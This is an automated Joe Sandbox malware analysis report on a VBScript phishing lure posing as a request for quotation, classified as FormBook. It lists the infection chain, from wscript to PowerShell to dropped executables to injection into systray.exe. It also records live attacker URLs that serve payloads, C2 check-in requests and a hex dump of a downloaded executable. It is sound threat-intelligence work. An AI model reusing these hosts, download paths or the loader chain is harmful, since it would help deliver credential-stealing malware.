Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
BINATONE LLC RFQ.Vbs.vbs

Overview

General Information

Sample name:BINATONE LLC RFQ.Vbs.vbs
Analysis ID:1612328
MD5:61667d33a7fa522f455efb015d93f29e
SHA1:41eb03c751f513ce2fd7ce63d6eebc1ef168e658
SHA256:a1103038e29734e77633a9f1f99e39149aa575f72b70f05f1fafb2de6e4986e5
Tags:vbsuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
PE file contains section with special chars
Performs DNS queries to domains with low reputation
Powershell drops PE file
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 2956 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BINATONE LLC RFQ.Vbs.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 1848 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\JSDSDGSD.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • x.exe (PID: 5752 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 7780AB6178383B8DC62F72D402C1148F)
        • RegAAsm.exe (PID: 2800 cmdline: "C:\Users\user\AppData\Local\Temp\RegAAsm.exe" MD5: 7176873D83D97247C18A9037FFA5964F)
          • HDIZeRcLxXsNvd.exe (PID: 2764 cmdline: "C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\qHLc38NH7.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
            • systray.exe (PID: 6540 cmdline: "C:\Windows\SysWOW64\systray.exe" MD5: 28D565BB24D30E5E3DE8AFF6900AF098)
              • firefox.exe (PID: 7120 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.3362243547.0000000002BB0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000008.00000002.3363072352.00000000015C0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000005.00000002.2678660679.00000000035F0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000009.00000002.3362422336.0000000003060000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000008.00000002.3363813241.0000000005020000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            5.2.RegAAsm.exe.7d0000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Script Initiated Connection to Non-Local Network
              Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 87.120.120.56, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 2956, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49704
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BINATONE LLC RFQ.Vbs.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BINATONE LLC RFQ.Vbs.vbs", CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BINATONE LLC RFQ.Vbs.vbs", ProcessId: 2956, ProcessName: wscript.exe
              Sigma detected: Script Initiated Connection
              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 87.120.120.56, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 2956, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49704
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BINATONE LLC RFQ.Vbs.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BINATONE LLC RFQ.Vbs.vbs", CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BINATONE LLC RFQ.Vbs.vbs", ProcessId: 2956, ProcessName: wscript.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\JSDSDGSD.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\JSDSDGSD.ps1", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BINATONE LLC RFQ.Vbs.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 2956, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\JSDSDGSD.ps1", ProcessId: 1848, ProcessName: powershell.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-02-11T18:16:23.984387+010020188561A Network Trojan was detected87.120.120.5680192.168.2.549704TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-02-11T18:17:36.193139+010028554651A Network Trojan was detected192.168.2.54997913.248.169.4880TCP
              2025-02-11T18:17:59.423104+010028554651A Network Trojan was detected192.168.2.549984188.114.96.380TCP
              2025-02-11T18:18:12.590995+010028554651A Network Trojan was detected192.168.2.54998813.248.169.4880TCP
              2025-02-11T18:18:25.993475+010028554651A Network Trojan was detected192.168.2.549992199.59.243.22880TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-02-11T18:17:51.788616+010028554641A Network Trojan was detected192.168.2.549981188.114.96.380TCP
              2025-02-11T18:17:54.338121+010028554641A Network Trojan was detected192.168.2.549982188.114.96.380TCP
              2025-02-11T18:17:56.873315+010028554641A Network Trojan was detected192.168.2.549983188.114.96.380TCP
              2025-02-11T18:18:05.995722+010028554641A Network Trojan was detected192.168.2.54998513.248.169.4880TCP
              2025-02-11T18:18:07.505800+010028554641A Network Trojan was detected192.168.2.54998613.248.169.4880TCP
              2025-02-11T18:18:10.053088+010028554641A Network Trojan was detected192.168.2.54998713.248.169.4880TCP
              2025-02-11T18:18:18.365894+010028554641A Network Trojan was detected192.168.2.549989199.59.243.22880TCP
              2025-02-11T18:18:20.916150+010028554641A Network Trojan was detected192.168.2.549990199.59.243.22880TCP
              2025-02-11T18:18:23.465679+010028554641A Network Trojan was detected192.168.2.549991199.59.243.22880TCP
              2025-02-11T18:18:32.133417+010028554641A Network Trojan was detected192.168.2.549993188.114.97.380TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: http://87.120.120.56/crypt/blaq.exeAvira URL Cloud: Label: malware
              Antivirus detection for dropped file
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeAvira: detection malicious, Label: TR/Crypt.ZPACK.Gen
              Source: C:\Users\user\AppData\Local\Temp\x.exeAvira: detection malicious, Label: HEUR/AGEN.1313095
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeReversingLabs: Detection: 64%
              Multi AV Scanner detection for submitted file
              Source: BINATONE LLC RFQ.Vbs.vbsVirustotal: Detection: 18%Perma Link
              Yara detected FormBook
              Source: Yara matchFile source: 5.2.RegAAsm.exe.7d0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000009.00000002.3362243547.0000000002BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.3363072352.00000000015C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2678660679.00000000035F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.3362422336.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.3363813241.0000000005020000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.3362962777.0000000004950000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2677237054.00000000007D1000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2677849171.0000000001320000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Joe Sandbox ML detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for dropped file
              Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Temp\x.exeJoe Sandbox ML: detected
              Source: Binary string: systray.pdb source: RegAAsm.exe, 00000005.00000003.2642661331.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: systray.pdbGCTL source: RegAAsm.exe, 00000005.00000003.2642661331.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: RegAAsm.exe, 00000005.00000003.2577245110.00000000011F7000.00000004.00000020.00020000.00000000.sdmp, RegAAsm.exe, 00000005.00000002.2678032465.000000000153E000.00000040.00001000.00020000.00000000.sdmp, RegAAsm.exe, 00000005.00000003.2575010609.0000000001045000.00000004.00000020.00020000.00000000.sdmp, RegAAsm.exe, 00000005.00000002.2678032465.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000009.00000003.2679203136.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000009.00000002.3363259888.0000000004F0E000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000009.00000002.3363259888.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000009.00000003.2674514644.0000000004A14000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: RegAAsm.exe, RegAAsm.exe, 00000005.00000003.2577245110.00000000011F7000.00000004.00000020.00020000.00000000.sdmp, RegAAsm.exe, 00000005.00000002.2678032465.000000000153E000.00000040.00001000.00020000.00000000.sdmp, RegAAsm.exe, 00000005.00000003.2575010609.0000000001045000.00000004.00000020.00020000.00000000.sdmp, RegAAsm.exe, 00000005.00000002.2678032465.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, systray.exe, systray.exe, 00000009.00000003.2679203136.0000000004BC8000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000009.00000002.3363259888.0000000004F0E000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000009.00000002.3363259888.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000009.00000003.2674514644.0000000004A14000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: HDIZeRcLxXsNvd.exe, 00000008.00000002.3362241286.00000000004AF000.00000002.00000001.01000000.0000000A.sdmp
              Source: C:\Windows\SysWOW64\systray.exeCode function: 9_2_02BCCA20 FindFirstFileW,FindNextFileW,FindClose,9_2_02BCCA20

              Software Vulnerabilities

              barindex
              Suspicious execution chain found
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeCode function: 4x nop then pop edi8_2_015D512A
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeCode function: 4x nop then xor eax, eax8_2_015DA999
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeCode function: 4x nop then pop edi8_2_015E621B
              Source: C:\Program Files (x86)\akoHchWxKbrkcxOFTdEFmULAgwfAVGNxHrLrhvUyoWoGkJQwBoJrBdbwpkDKDIRhBCAnfYqIiX\HDIZeRcLxXsNvd.exeCode function: 4x nop then pop edi8_2_015D5E2E
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4x nop then xor eax, eax9_2_02BB9F60
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4x nop then mov ebx, 00000004h9_2_04BB04BF

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2018856 - Severity 1 - ET MALWARE Windows executable base64 encoded : 87.120.120.56:80 -> 192.168.2.5:49704
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49984 -> 188.114.96.3:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49988 -> 13.248.169.48:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49990 -> 199.59.243.228:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49993 -> 188.114.97.3:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49987 -> 13.248.169.48:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49981 -> 188.114.96.3:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49985 -> 13.248.169.48:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49991 -> 199.59.243.228:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49979 -> 13.248.169.48:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49983 -> 188.114.96.3:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49989 -> 199.59.243.228:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49986 -> 13.248.169.48:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49982 -> 188.114.96.3:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49992 -> 199.59.243.228:80
              System process connects to network (likely due to code injection or exploit)
              Source: C:\Windows\System32\wscript.exeNetwork Connect: 87.120.120.56 80Jump to behavior
              Performs DNS queries to domains with low reputation
              Source: DNS query: www.zkplant.xyz
              Source: DNS query: www.meacci.xyz
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 11 Feb 2025 17:16:34 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Fri, 07 Feb 2025 08:38:49 GMTETag: "46800-62d89499c1840"Accept-Ranges: bytesContent-Length: 288768Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 79 01 09 a0 3d 60 67 f3 3d 60 67 f3 3d 60 67 f3 1a a6 a8 f3 3a 60 67 f3 1a a6 aa f3 3c 60 67 f3 1a a6 ab f3 3c 60 67 f3 52 69 63 68 3d 60 67 f3 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 01 00 69 65 c0 55 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 56 04 00 00 00 00 00 00 00 00 00 d0 13 00 00 00 10 00 00 00 70 04 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 04 00 00 02 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d4 55 04 00 00 10 00 00 00 56 04 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
              Source: global trafficHTTP traffic detected: GET /crypt/blaq.exe HTTP/1.1Host: 87.120.120.56Connection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.56
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.56
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.56
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.56
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.56
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.56
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.56
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.56
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.56
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.56
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.56
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.56
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.56
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.56
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.56
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.56
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.56
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.56
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.56
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.56
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.56
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.56
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.56
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.56
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.56
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.56
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.56
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.56
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.56
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.56
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.56
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.56
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.56
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.56
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.56
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.56
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.56
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.56
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.56
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.56
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.56
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.56
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.56
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.56
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.56
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.56
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.56
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.56
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.56
              Source: unknownTCP traffic detected without corresponding DNS query: 87.120.120.56
              Source: global trafficHTTP traffic detected: GET /crypt/blaqq.ps1 HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 87.120.120.56Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /crypt/blaq.exe HTTP/1.1Host: 87.120.120.56Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /t2z5/?y2S=EVRHgpGhH&R2Pdz6z=8VSe6D3+FdM96toZZUGywJ1DVdRTA+eWswse+lRCZ5nd7JghEm3UTq1Rza0ArSKGlR2SDZuSDjjXV5rchgKJLSqvVnsCaaycbDRjKL0/ooJrL1Hb0aBfmSMKdswh9JhSbw== HTTP/1.1Host: www.zkplant.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
              Source: global trafficHTTP traffic detected: GET /gc4d/?R2Pdz6z=LebFdeUSCMRA/h5tZLycaH7jqAY1vcKCCUGQxkTYOySh8g+yOOCAzgs61Icsq5MKVQ4M10tPO8U+pEslzEpxyKOmXBj1eqfcXSJe7zxRH3B85h1j/tJSgpcu0C0SlXp5Og==&y2S=EVRHgpGhH HTTP/1.1Host: www.adventurerepair24.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
